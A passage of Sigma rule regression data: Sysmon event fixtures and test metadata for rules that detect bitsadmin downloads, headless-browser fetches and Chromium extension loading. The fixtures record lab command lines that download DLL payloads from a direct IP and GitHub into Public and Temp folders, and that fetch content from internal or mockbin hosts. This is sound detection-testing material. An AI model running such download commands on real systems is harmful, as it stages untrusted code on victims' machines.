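The `cred_dump_tools_dropped_files` fixture on this page carries four EID 11 events (two binaries plus their `:Zone.Identifier` streams) yet declares `match_count: 1`; the ADS filter in the example is one way to arrive at a single hit for such a fixture and shows why a bare `contains` on the tool name over-counts. How the actual rule achieves its count is not stated on this page. Note also that the two `dbgcore` fixtures (EID 7 image load and EID 10 process access) come from the same `WerFaultSecure.exe` run a few milliseconds apart, so a rule on either event alone is expected to fire once per dump attempt.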
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/d059842b-6b9d-4ed1-b5c3-5b89143c6ede.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T04:33:20.562782Z\"\n        }\n      },\n      \"EventRecordID\": 18463,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-10 04:33:20.557\",\n      \"ProcessGuid\": \"0197231E-F810-6938-B710-000000000800\",\n      \"ProcessId\": 7732,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\bitsadmin.exe\",\n      \"FileVersion\": \"7.8.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"BITS administration utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"bitsadmin.exe\",\n      \"CommandLine\": \"bitsadmin  /transfer n https://www.atomicredteam.io/atomic-red-team/atomics/T1218.011 hello.html\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": 
\"Medium\",\n      \"Hashes\": \"MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30\",\n      \"ParentProcessGuid\": \"00000000-0000-0000-0000-000000000000\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"-\",\n      \"ParentCommandLine\": \"-\",\n      \"ParentUser\": \"-\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/info.yml",
    "content": "id: 83c4dfac-7b5b-4a0e-803e-cca15c933c5e\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: d059842b-6b9d-4ed1-b5c3-5b89143c6ede\n      title: File Download Via Bitsadmin\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download/d059842b-6b9d-4ed1-b5c3-5b89143c6ede.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/99c840f2-2012-46fd-9141-c761987550ef.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T04:44:13.414345Z\"\n        }\n      },\n      \"EventRecordID\": 18552,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-10 04:44:13.371\",\n      \"ProcessGuid\": \"0197231E-FA9D-6938-D910-000000000800\",\n      \"ProcessId\": 9532,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\bitsadmin.exe\",\n      \"FileVersion\": \"7.8.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"BITS administration utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"bitsadmin.exe\",\n      \"CommandLine\": \"bitsadmin  /transfer n https://12.34.45.67/calc.dll C:\\\\Users\\\\Public\\\\calc.dll\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": 
\"Medium\",\n      \"Hashes\": \"MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30\",\n      \"ParentProcessGuid\": \"00000000-0000-0000-0000-000000000000\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"-\",\n      \"ParentCommandLine\": \"-\",\n      \"ParentUser\": \"-\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/info.yml",
    "content": "id: 3e393301-93d2-4759-b4d6-b957bdc0ae32\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 99c840f2-2012-46fd-9141-c761987550ef\n      title: Suspicious Download From Direct IP Via Bitsadmin\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_direct_ip/99c840f2-2012-46fd-9141-c761987550ef.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/8518ed3d-f7c9-4601-a26c-f361a4256a0c.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T04:47:28.250802Z\"\n        }\n      },\n      \"EventRecordID\": 18580,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-10 04:47:28.224\",\n      \"ProcessGuid\": \"0197231E-FB60-6938-DD10-000000000800\",\n      \"ProcessId\": 8924,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\bitsadmin.exe\",\n      \"FileVersion\": \"7.8.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"BITS administration utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"bitsadmin.exe\",\n      \"CommandLine\": \"bitsadmin  /transfer n https://raw.githubusercontent.com/redcanaryco/atomic-red-team/refs/heads/master/atomics/T1047/bin/calc.dll C:\\\\Users\\\\Public\\\\Music\\\\calc.dll\",\n      \"CurrentDirectory\": \"C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      
\"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30\",\n      \"ParentProcessGuid\": \"00000000-0000-0000-0000-000000000000\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"-\",\n      \"ParentCommandLine\": \"-\",\n      \"ParentUser\": \"-\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/info.yml",
    "content": "id: 4788a4ef-6b50-4b68-9d10-d5471bd5fa02\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 8518ed3d-f7c9-4601-a26c-f361a4256a0c\n      title: Suspicious Download From File-Sharing Website Via Bitsadmin\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains/8518ed3d-f7c9-4601-a26c-f361a4256a0c.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T04:22:10.216650Z\"\n        }\n      },\n      \"EventRecordID\": 18325,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-10 04:22:10.201\",\n      \"ProcessGuid\": \"0197231E-F572-6938-8B10-000000000800\",\n      \"ProcessId\": 13808,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\bitsadmin.exe\",\n      \"FileVersion\": \"7.8.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"BITS administration utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"bitsadmin.exe\",\n      \"CommandLine\": \"bitsadmin  /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll C:\\\\Users\\\\xodih\\\\AppData\\\\Local\\\\Temp\\\\calc.dll\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      
\"TerminalSessionId\": 1,\n      \"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30\",\n      \"ParentProcessGuid\": \"0197231E-F570-6938-8A10-000000000800\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"swachchhanda\\\\xodih\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/info.yml",
    "content": "id: 7149a708-0d83-4917-8478-24e682260b6f\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 5b80a791-ad9b-4b75-bcc1-ad4e1e89c200\n      title: File With Suspicious Extension Downloaded Via Bitsadmin\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_extensions/5b80a791-ad9b-4b75-bcc1-ad4e1e89c200.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/2ddef153-167b-4e89-86b6-757a9e65dcac.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-12-10T04:29:18.813904Z\"\n        }\n      },\n      \"EventRecordID\": 18412,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3208,\n          \"ThreadID\": 1724\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"swachchhanda\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-12-10 04:29:18.786\",\n      \"ProcessGuid\": \"0197231E-F71E-6938-AE10-000000000800\",\n      \"ProcessId\": 4432,\n      \"Image\": \"C:\\\\Windows\\\\System32\\\\bitsadmin.exe\",\n      \"FileVersion\": \"7.8.26100.1 (WinBuild.160101.0800)\",\n      \"Description\": \"BITS administration utility\",\n      \"Product\": \"Microsoft® Windows® Operating System\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"bitsadmin.exe\",\n      \"CommandLine\": \"bitsadmin  /transfer n https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll C:\\\\Users\\\\Public\\\\calc.dll\",\n      \"CurrentDirectory\": \"C:\\\\Program Files\\\\\",\n      \"User\": \"swachchhanda\\\\xodih\",\n      \"LogonGuid\": \"0197231E-AB9F-67AA-FB17-030000000000\",\n      \"LogonId\": \"0x317fb\",\n      \"TerminalSessionId\": 1,\n      
\"IntegrityLevel\": \"Medium\",\n      \"Hashes\": \"MD5=4FCFE1D61E6D962F06CE2B61FC11BC0F,SHA256=6FEB16602A2FD1158C6F7E56E3B05A5E9AC01E88089535978C890EC6954A5AFA,IMPHASH=44794EEDDEB70144ABA2F1483E762F30\",\n      \"ParentProcessGuid\": \"00000000-0000-0000-0000-000000000000\",\n      \"ParentProcessId\": 14736,\n      \"ParentImage\": \"-\",\n      \"ParentCommandLine\": \"-\",\n      \"ParentUser\": \"-\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/info.yml",
    "content": "id: 5e620f3d-549d-4515-ae46-981d30ac4683\ndescription: N/A\ndate: 2025-12-10\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\nrule_metadata:\n    - id: 2ddef153-167b-4e89-86b6-757a9e65dcac\n      title: File Download Via Bitsadmin To A Suspicious Target Folder\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      match_count: 1\n      path: regression_data/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder/2ddef153-167b-4e89-86b6-757a9e65dcac.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:20:06.319147Z\"\n        }\n      },\n      \"EventRecordID\": 32822341,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:20:06.307\",\n      \"ProcessGuid\": \"5AA13A44-ACA6-68FE-DE5D-000000004002\",\n      \"ProcessId\": 9184,\n      \"Image\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n      \"FileVersion\": \"141.0.7390.123\",\n      \"Description\": \"Google Chrome\",\n      \"Product\": \"Google Chrome\",\n      \"Company\": \"Google LLC\",\n      \"OriginalFileName\": \"chrome.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"  --headless --enable-logging --disable-gpu --dump-dom \\\"http://10.0.1.14/nas.txt\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      
\"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/info.yml",
    "content": "id: 941b970d-535f-4543-8985-768e589fa8ff\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e\n      title: File Download with Headless Browser\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download/0e8cfe08-02c9-4815-a2f8-0d157b7ed33e.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:25:03.181097Z\"\n        }\n      },\n      \"EventRecordID\": 32923086,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:25:03.169\",\n      \"ProcessGuid\": \"5AA13A44-ADCF-68FE-295E-000000004002\",\n      \"ProcessId\": 4788,\n      \"Image\": \"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n      \"FileVersion\": \"141.0.7390.123\",\n      \"Description\": \"Google Chrome\",\n      \"Product\": \"Google Chrome\",\n      \"Company\": \"Google LLC\",\n      \"OriginalFileName\": \"chrome.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\\\"  --load-extension=\\\"C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\HHe2lr\\\"\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      \"TerminalSessionId\": 2,\n      \"IntegrityLevel\": 
\"High\",\n      \"Hashes\": \"SHA1=F946FD910D1D2B6BF54DDD57FEBF5F066058BC5A,MD5=36E9DFE8CEAE9E88100C6BBD1550DEDD,SHA256=6A9CF74C9FA74C16EA6F26351FA5EF8CE11191DBBD5EEADCB2591904767B96B0,IMPHASH=3E82AE93B8102462DDA81604AF164E8E\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/info.yml",
    "content": "id: e159e6ce-c717-4a38-af44-ff8c4f011c37\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21\n      title: Chromium Browser Instance Executed With Custom Extension\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_load_extension/88d6e60c-759d-4ac1-a447-c0f1466c2d21.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.json",
    "content": "{\n  \"Event\": {\n    \"#attributes\": {\n      \"xmlns\": \"http://schemas.microsoft.com/win/2004/08/events/event\"\n    },\n    \"System\": {\n      \"Provider\": {\n        \"#attributes\": {\n          \"Name\": \"Microsoft-Windows-Sysmon\",\n          \"Guid\": \"5770385F-C22A-43E0-BF4C-06F5698FFBD9\"\n        }\n      },\n      \"EventID\": 1,\n      \"Version\": 5,\n      \"Level\": 4,\n      \"Task\": 1,\n      \"Opcode\": 0,\n      \"Keywords\": \"0x8000000000000000\",\n      \"TimeCreated\": {\n        \"#attributes\": {\n          \"SystemTime\": \"2025-10-26T23:28:43.862519Z\"\n        }\n      },\n      \"EventRecordID\": 32995046,\n      \"Correlation\": null,\n      \"Execution\": {\n        \"#attributes\": {\n          \"ProcessID\": 3308,\n          \"ThreadID\": 4008\n        }\n      },\n      \"Channel\": \"Microsoft-Windows-Sysmon/Operational\",\n      \"Computer\": \"ar-win-dc.attackrange.local\",\n      \"Security\": {\n        \"#attributes\": {\n          \"UserID\": \"S-1-5-18\"\n        }\n      }\n    },\n    \"EventData\": {\n      \"RuleName\": \"-\",\n      \"UtcTime\": \"2025-10-26 23:28:43.810\",\n      \"ProcessGuid\": \"5AA13A44-AEAB-68FE-435E-000000004002\",\n      \"ProcessId\": 5784,\n      \"Image\": \"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\",\n      \"FileVersion\": \"141.0.3537.99\",\n      \"Description\": \"Microsoft Edge\",\n      \"Product\": \"Microsoft Edge\",\n      \"Company\": \"Microsoft Corporation\",\n      \"OriginalFileName\": \"msedge.exe\",\n      \"CommandLine\": \"\\\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\\\"   --headless=new --disable-gpu https://mockbin.org/bin/31b1332f-8f5c-490e-8ec0-78e77b4e5709\",\n      \"CurrentDirectory\": \"C:\\\\\",\n      \"User\": \"ATTACKRANGE\\\\Administrator\",\n      \"LogonGuid\": \"5AA13A44-568F-68FB-E39A-520000000000\",\n      \"LogonId\": \"0x529ae3\",\n      
\"TerminalSessionId\": 2,\n      \"IntegrityLevel\": \"High\",\n      \"Hashes\": \"SHA1=77B843BADE25E2B6FEA4ED02D9DCFDB32759285A,MD5=2CB9DCC4B733F88A7155F0D63AC634B8,SHA256=151A7E879BB4B534AC95D61B982C899CFF3DC01EDC2575FC8D71B3B9B44C8834,IMPHASH=4C2A67DEB457B8BF9F317820EE11E05D\",\n      \"ParentProcessGuid\": \"5AA13A44-0C90-68FC-BF1D-000000004002\",\n      \"ParentProcessId\": 10048,\n      \"ParentImage\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\",\n      \"ParentCommandLine\": \"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\"\",\n      \"ParentUser\": \"ATTACKRANGE\\\\Administrator\"\n    }\n  }\n}\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/info.yml",
    "content": "id: 686da1dd-caec-47d8-a254-07ab54f1f3c7\ndescription: N/A\ndate: 2025-10-24\nauthor: SigmaHQ Team\nrule_metadata:\n    - id: 1c526788-0abe-4713-862f-b520da5e5316\n      title: Chromium Browser Headless Execution To Mockbin Like Site\nregression_tests_info:\n    - name: Positive Detection Test\n      type: evtx\n      provider: Microsoft-Windows-Sysmon\n      path: regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse/1c526788-0abe-4713-862f-b520da5e5316.evtx\n"
  },
  {
    "path": "regression_data/rules/windows/process_creation/proc_creation_win_browsers_chromium_susp_load_extension/27ba3207-dd30-4812-abbf-5d20c57d474e.json",
